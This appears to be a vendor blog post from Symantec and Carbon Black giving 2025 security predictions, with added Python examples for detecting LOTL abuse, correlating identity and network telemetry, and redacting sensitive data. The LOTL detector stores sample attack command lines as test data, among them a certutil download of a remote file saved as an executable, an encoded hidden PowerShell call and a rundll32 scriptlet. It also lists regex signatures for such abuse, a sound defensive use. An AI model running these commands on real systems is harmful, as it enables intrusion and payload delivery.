9 More Predictions for 2025
And how you can protect yourself against a forecast of volatile threats.
On Dec. 17, the Symantec Threat Hunter Team's Principal Editor Dick O'Brien distilled a year's worth of first-hand cyberattack investigations into five top predictions that signal what the cybersecurity industry can expect to face in 2025. The predictions point to an uptick in Russian cyber aggression, a growing ransomware ecosystem, attackers targeting once-trusted cloud platforms, even more Living Off the Land (LOTL) tool use and ransomware groups expanding into new geographies.
As usual, the insights from these renowned threat experts reveal what a high-value asset the Symantec Threat Hunter Team is to SecOps leaders everywhere. And while anticipating threats is essential to your defense, so is making sure you have in place the protections you need to mount that defense.
Predictions with solutions from our product experts
At Symantec and Carbon Black, our mission is to provide enterprise-grade security for all. Proliferating cybercrime tools and growing numbers of threat actors are putting all organizations at risk, so all organizations deserve the kind of protections that the largest enterprises have traditionally enjoyed. We polled our product experts for their own views on how to stay safe from the threats we’ll face in 2025 and beyond. Many even offered a few predictions of their own.
1. Russian aggressors (and every other kind) will face EDR and application control.
Attackers can strike from anywhere, but intelligent defenses make all the difference. With Carbon Black's cloud-native endpoint detection and response (EDR) or Symantec's on-premises EDR, organizations can flag network connections from Russian IP address space and detect the techniques used by groups like Dragonfly that target critical infrastructure. Treat source geolocation as one signal to correlate with behavior rather than a verdict: attackers routinely route through infrastructure in other countries, so the behavioral detections matter more than the IP. Application control, pioneered by Carbon Black and its predecessor Bit9, allows only trusted applications and files to run in your environment and blocks unapproved code and executables by default, a core piece of a zero trust posture. Carbon Black App Control can be deployed on-premises or in the cloud to protect assets other solutions don't, like legacy systems and point-of-sale devices.
2. Ransomware attackers will bank on you having baseline protection.
Whether their weapon of choice is ransomware or another technique, attackers often make their move on the assumption that your organization runs only basic, table-stakes protection. You need to prove them wrong. Protections like Symantec EDR and Carbon Black EDR can detect threat behaviors commonly associated with ransomware, such as mass file modification, shadow copy deletion and staging of data for exfiltration, that other frontline tools don't pick up. Meanwhile, data loss prevention (DLP) solutions like Symantec DLP monitor sensitive data and block its unauthorized movement, regardless of the attack vector. And sensitive data, which today's ransomware crews exfiltrate before they encrypt, is exactly what those attacks are after.
3. Living Off the Land (LOTL) attacks may have less land to live off of.
LOTL attacks are on the rise, with threat actors using built-in operating system features and legitimate administrative tools to launch ransomware and other attacks. (Nearly half of ransomware attacks from 2021–2023 used LOTL tools.) The latest cybersecurity solutions can help prevent these incursions. One is Adaptive Protection, a unique feature of Symantec Endpoint Security (SES) that learns which legitimate tools and behaviors are normal in your environment and automatically blocks anomalous use of them. In addition, Symantec EDR customers can subscribe to a watchlist of vulnerable and malicious drivers that attackers load to gain kernel access and disable defenses.
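The detection idea behind blocking "anomalous use of legitimate tools" can be shown in a few dozen lines. The following is an added example written for this page, not Symantec or Carbon Black product code. It combines two signals over process-creation telemetry: a small signature list of command-line patterns that are common abuses of signed Windows binaries, and a per-user baseline of binaries seen during a learning window, so the first use of a legitimate tool by an account is surfaced even when no signature matches. The event records and the rule set are constructed for the example; the field names and the user and host names are assumptions, not a real product schema.

```python
"""Flag living-off-the-land (LOTL) abuse in process-creation events.

Added example for illustration; not product code. Events below are
constructed sample data, not real telemetry.
"""
import re
from collections import defaultdict

# Constructed sample events from a learning window (what "normal" looks like).
BASELINE_EVENTS = [
    {"user": "alice", "image": "powershell.exe", "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"user": "alice", "image": "robocopy.exe", "cmd": "robocopy.exe D:\\src E:\\dst /MIR"},
    {"user": "bob", "image": "excel.exe", "cmd": "EXCEL.EXE"},
    {"user": "svc-sql", "image": "sqlservr.exe", "cmd": "sqlservr.exe -sMSSQLSERVER"},
]

# Constructed sample events to evaluate; the encoded command is truncated on purpose.
NEW_EVENTS = [
    {"user": "alice", "image": "powershell.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo..."},
    {"user": "bob", "image": "certutil.exe", "cmd": "certutil.exe -urlcache -split -f http://203.0.113.9/a.txt a.exe"},
    {"user": "bob", "image": "excel.exe", "cmd": "EXCEL.EXE C:\\Users\\bob\\q3.xlsx"},
    {"user": "svc-sql", "image": "rundll32.exe", "cmd": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\""},
    {"user": "alice", "image": "robocopy.exe", "cmd": "robocopy.exe D:\\src E:\\dst /MIR"},
]

# Signature rules: (name, regex over the full command line). These are widely
# documented LOTL abuse patterns; tune and extend them for your environment.
SIGNATURES = [
    ("powershell_encoded_hidden", re.compile(r"powershell.*(-enc(odedcommand)?\s|-w(indowstyle)?\s+hidden)", re.I)),
    ("certutil_download", re.compile(r"certutil.*-urlcache.*https?://", re.I)),
    ("rundll32_javascript", re.compile(r"rundll32.*javascript:", re.I)),
    ("mshta_remote", re.compile(r"mshta.*https?://", re.I)),
    ("regsvr32_scriptlet", re.compile(r"regsvr32.*/i:https?://", re.I)),
    ("bitsadmin_transfer", re.compile(r"bitsadmin.*/transfer", re.I)),
]


def build_baseline(events):
    """Map each user to the set of binaries they ran during the learning window."""
    seen = defaultdict(set)
    for e in events:
        seen[e["user"]].add(e["image"].lower())
    return seen


def evaluate(event, baseline):
    """Return the list of alert reasons for one event (empty list means benign)."""
    reasons = []
    for name, pattern in SIGNATURES:
        if pattern.search(event["cmd"]):
            reasons.append(f"signature:{name}")
    image = event["image"].lower()
    # Behavioral signal: a binary this account has never been seen running.
    if image not in baseline.get(event["user"], set()):
        reasons.append(f"first_use:{event['user']}:{image}")
    return reasons


def detect(new_events, baseline_events):
    """Evaluate every new event against the learned baseline; return (user, image, reasons) tuples."""
    baseline = build_baseline(baseline_events)
    alerts = []
    for e in new_events:
        reasons = evaluate(e, baseline)
        if reasons:
            alerts.append((e["user"], e["image"], reasons))
    return alerts


if __name__ == "__main__":
    for user, image, reasons in detect(NEW_EVENTS, BASELINE_EVENTS):
        print(f"ALERT user={user} image={image} reasons={reasons}")
```

On the sample data this produces three alerts: alice's encoded, hidden-window PowerShell (signature only, since she runs PowerShell routinely), bob's certutil download (signature plus first use) and the service account's rundll32 scriptlet (signature plus first use). The first-use signal is what makes a product like this useful against tools that have no signature yet; in practice the baseline would be keyed per host as well as per user and aged over a rolling window.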
4. "Identity" will become the next big domain in data-driven detection and analytical prevention.
Threat actors are now stealing credentials and session tokens and studying how their victims behave so they can fully masquerade as legitimate users, even ones with elevated privileges. It is getting harder to identify these attacks based solely on tool use, and more necessary to incorporate identity and access information (who logged on, from where, with what privilege) into the detection logic. The industry will revisit User and Entity Behavior Analytics (UEBA), guiding it along more integrated and targeted pathways.
5. Correlation will remain the holy grail, but centralization will be nuanced.
Everyone now accepts that cybersecurity must be data-driven, that a whole new level of telemetry must be collected and that information must be correlated across the domains of network, endpoint, information, identity and infrastructure. Vendors will think outside the box when it comes to centralization, leaning strongly into concepts like intelligent filtering, tiered aggregation and peer-like cross correlation—and will build architectures specialized for cybersecurity.
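Predictions 4 and 5 together describe one detection pattern: an identity signal that is too noisy to act on alone becomes high-confidence once endpoint and network telemetry for the same user and host are correlated with it. The following is an added example written for this page, not code from Symantec, Carbon Black or any UEBA product. It joins three constructed event streams (logons, process creations and outbound flows) on a (user, host) key inside a short window after an anomalous privileged logon. The account names, host names, window length, internal-address prefix and transfer threshold are all assumptions chosen for the illustration.

```python
"""Correlate identity, endpoint and network telemetry on one (user, host) key.

Added example; not product code. All events are constructed sample data
with epoch-second timestamps.
"""
from collections import defaultdict

WINDOW_SECONDS = 600            # correlate events within 10 minutes of the logon
INTERNAL_PREFIX = "10."         # crude "is this destination internal?" test for the example
LARGE_TRANSFER_BYTES = 100_000_000

# Identity baseline: hosts each account normally logs on from (constructed).
KNOWN_HOSTS = {
    "alice": {"WS-ALICE"},
    "da-backup": {"SRV-BACKUP1", "SRV-BACKUP2"},
}
PRIVILEGED = {"da-backup"}

LOGONS = [  # identity domain: successful logons
    {"ts": 1000, "user": "alice", "host": "WS-ALICE"},
    {"ts": 1200, "user": "da-backup", "host": "WS-ALICE"},    # domain admin on a workstation
    {"ts": 5000, "user": "da-backup", "host": "SRV-BACKUP1"}, # normal for this account
]
PROCESSES = [  # endpoint domain: process creations
    {"ts": 1210, "user": "da-backup", "host": "WS-ALICE", "image": "ntdsutil.exe"},
    {"ts": 1300, "user": "alice", "host": "WS-ALICE", "image": "outlook.exe"},
    {"ts": 5050, "user": "da-backup", "host": "SRV-BACKUP1", "image": "robocopy.exe"},
]
CONNECTIONS = [  # network domain: outbound flows
    {"ts": 1290, "host": "WS-ALICE", "dst": "198.51.100.7", "bytes_out": 480_000_000},
    {"ts": 1310, "host": "WS-ALICE", "dst": "10.0.0.25", "bytes_out": 2_000},
    {"ts": 5100, "host": "SRV-BACKUP1", "dst": "10.0.0.40", "bytes_out": 900_000_000},
]


def identity_anomalies(logons, known_hosts, privileged):
    """Identity signal: privileged accounts logging on from hosts outside their baseline."""
    return [lg for lg in logons
            if lg["user"] in privileged and lg["host"] not in known_hosts.get(lg["user"], set())]


def in_window(anchor_ts, ts):
    """True when ts falls within WINDOW_SECONDS after anchor_ts."""
    return 0 <= ts - anchor_ts <= WINDOW_SECONDS


def correlate(logons, processes, connections, known_hosts, privileged):
    """Escalate an anomalous logon using endpoint and network events from the same host."""
    procs_by_key = defaultdict(list)
    for p in processes:
        procs_by_key[(p["user"], p["host"])].append(p)
    conns_by_host = defaultdict(list)
    for c in connections:
        conns_by_host[c["host"]].append(c)

    alerts = []
    for logon in identity_anomalies(logons, known_hosts, privileged):
        procs = [p["image"] for p in procs_by_key[(logon["user"], logon["host"])]
                 if in_window(logon["ts"], p["ts"])]
        exfil = [c for c in conns_by_host[logon["host"]]
                 if in_window(logon["ts"], c["ts"])
                 and not c["dst"].startswith(INTERNAL_PREFIX)
                 and c["bytes_out"] >= LARGE_TRANSFER_BYTES]
        # Identity alone is "medium"; identity + endpoint + network completes the chain.
        severity = "high" if procs and exfil else "medium"
        alerts.append({
            "user": logon["user"], "host": logon["host"], "logon_ts": logon["ts"],
            "processes": procs, "external_transfers": [c["dst"] for c in exfil],
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(LOGONS, PROCESSES, CONNECTIONS, KNOWN_HOSTS, PRIVILEGED):
        print(alert)
```

On the sample data the only anomalous logon is the domain admin on a workstation; the ntdsutil.exe launch and the large external transfer that follow within the window raise it to high severity, while the same account's later logon to its usual backup server produces nothing. This is also why the text's point about centralization is nuanced: the join needs all three streams on one key, but the bulk of the raw telemetry never has to leave the tier where it was collected if the filtering runs first.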
6. Customers will expect automation and commoditization of last decade’s breakthroughs.
A few years ago, customers weren't willing to hand decisions with potentially career-ending operational impact over to advanced analytics, machine learning or AI. But fast-forward to now and customers are asking, "If you can detect with confidence and respond with ease, why haven't you automated all that for us?" They want what was advanced and interactive a few years ago to become built-in and automatic. Vendors that have stored years of structured, curated attack analysis and world-class threat intel will be well-positioned to immediately take advantage of large language models (LLMs) and deliver that future. Vendors lacking these will struggle.
7. Threat detection and response will consolidate across hybrid environments.
Hybrid work environments are intensifying the challenge of securing endpoints across diverse on-premises and cloud systems. In 2025, unified threat detection and response systems will become essential. These platforms will need to combine EDR, extended detection and response (XDR) and security orchestration to monitor, detect and remediate threats in real time. The shift leverages automation and threat intelligence to reduce blind spots across distributed workforces and accelerate response times. Solutions offering deep visibility into endpoint behaviors and integration with broader threat intelligence ecosystems are the ones best poised to address this need.
8. Advanced data loss prevention (DLP) strategies will focus on decentralized workflows.
The rise of generative AI tools, remote work and decentralized workflows has heightened the risk of inadvertent or malicious data leakage. Organizations will prioritize advanced DLP strategies incorporating context-aware data protection and (as noted above) intelligent user behavior analytics. In 2025, DLP solutions will evolve with natural language processing (NLP) and machine learning, enabling real-time detection of sensitive data sharing across collaboration platforms and cloud services. Proactive measures, like automated redaction and granular access controls, will also gain prominence.
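The content-aware detection and automated redaction the paragraph describes can be made concrete without any NLP machinery. The following is an added example written for this page, not Symantec DLP code. It scans a collaboration message for payment card numbers, US Social Security numbers and AWS access key IDs, validates card candidates with the Luhn check so that arbitrary 16-digit strings such as order numbers are not flagged, and redacts only confirmed findings before the message is forwarded. The sample messages are constructed; the AWS key shown is the placeholder value used in AWS documentation, and the detector patterns are deliberately minimal.

```python
"""Content-aware DLP check with automated redaction for a chat message.

Added example; not product code. Sample messages are constructed.
"""
import re

CARD_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")      # 13-19 digits, optional separators
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
AWS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")        # AWS access key ID format

# Constructed sample messages.
MESSAGES = [
    "Can you charge card 4111 1111 1111 1111 exp 12/27 for the invoice?",
    "Order 1234567890123456 shipped, tracking attached",
    "SSN is 078-05-1120, and the key is AKIAIOSFODNN7EXAMPLE",
]


def luhn_ok(digits):
    """Luhn checksum: True for a syntactically valid payment card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_sensitive(text):
    """Return a list of (kind, matched_text) findings; card candidates must pass Luhn."""
    findings = []
    for m in CARD_RE.finditer(text):
        if luhn_ok(re.sub(r"[ -]", "", m.group())):
            findings.append(("card", m.group()))
    for m in SSN_RE.finditer(text):
        findings.append(("ssn", m.group()))
    for m in AWS_KEY_RE.finditer(text):
        findings.append(("aws_access_key", m.group()))
    return findings


def redact(text):
    """Replace confirmed findings in place, keeping the last four card digits for reconciliation."""
    out = text
    for kind, match in find_sensitive(text):
        if kind == "card":
            digits = re.sub(r"[ -]", "", match)
            replacement = "[CARD ****" + digits[-4:] + "]"
        else:
            replacement = f"[{kind.upper()} REDACTED]"
        out = out.replace(match, replacement)
    return out


if __name__ == "__main__":
    for msg in MESSAGES:
        print(find_sensitive(msg), "->", redact(msg))
```

The Luhn step is the "context-aware" part in miniature: the second message contains a 16-digit number that fails the checksum and passes through untouched, while the first is redacted to its last four digits. A production policy would add document-level context (who is sharing, with whom, over which channel) on top of the content match, which is where the identity and behavior analytics discussed earlier come in.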
9. Cybersecurity sales channel strategies will shift.
Traditional sales channels are no longer equipped to handle the complexities of today’s cybersecurity landscape. Organizations increasingly recognize that scaling their channel strategies requires more than just transactional partnerships—it demands a collaborative ecosystem where partners are empowered with the tools, training and insights needed to deliver seamless, integrated solutions through local partners they know and trust. As we move into 2025, a new channel go-to-market model, led by Broadcom’s groundbreaking Catalyst Partner Program, is poised to set a trend that other technology companies will likely follow.
These won’t be the only trends that define 2025, but it’s a safe bet they will land on your radar at some point. When they do, I hope you have the protections in place to meet the challenges of this coming year with confidence and competence.
Questions? Concerns? Contact us, and we’ll get you in touch with a local expert who can help.